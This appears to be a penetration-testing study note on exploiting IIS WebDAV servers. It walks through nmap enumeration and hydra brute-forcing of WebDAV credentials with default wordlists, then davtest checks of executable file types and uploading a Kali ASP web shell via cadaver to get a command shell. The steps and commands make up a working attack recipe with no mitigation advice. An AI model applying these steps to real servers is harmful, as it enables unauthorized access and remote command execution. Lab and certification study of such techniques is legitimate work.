Frequently exploited Windows Services

IIS WebDAV
General information
IIS
Default ports
80, 443
Supported executed files
.asp
.aspx
.config
.php
WebDAV
WebDAV is a protocol that allows you to edit web content on a server using HTTP or HTTPS connections. It has advantages over FTP such as more security options and file locking.
Default ports
80, 443
Needs legitimate credentials, since it implements authentication in form of a username/password
Steps of exploitation
Enumeration. Identify whether WebDAV has been configured to run on the IIS web server.
Brute-force attack on the WebDAV server in order to identify legitimate credentials that we can use for authentication.
Upload a malicious (like a .asp payload) and execute arbitrary commands or obtain a reverse shell on the target.
Useful tools
davtest -> Used to scan. authenticate and exploit a WebDAV server.
cadaver -> Supports file upload, download, on-screen display, in-place editing, namespace operations (move/copy), collection creation and deletion, property manipulation, and resource locking on WebDAV servers.
Exploitation
nmap
nmap -sV -sC $IP

nmap deep dive
nmap -sv -p 80 --script=http-enum $IP

Bruteforce the authentication
The address will be http://%IP/webdav/
hydra -L /usr/share/wordlists/metasploit/common_users.txt -P /usr/share/wordlists/metasploit/common_passwords.txt $IP http-get /webdav/
davtest
davtest -auth admin:password_123 -url http://$IP/webdav

The most important section of the output, with that we can see that .asp can be executed and we can get our reverse shell wih that

cadaver
cadaver http://$IP/webdav
Put credentials and get a cmd shell
Use kali linux pre-package web shells to upload a file and get access
Folder:
/usr/share/webshells
Using the cadaver shell upload the web shell
put /usr/share/webshells/asp/cmd
Go via UI and execute the web shell


Last updated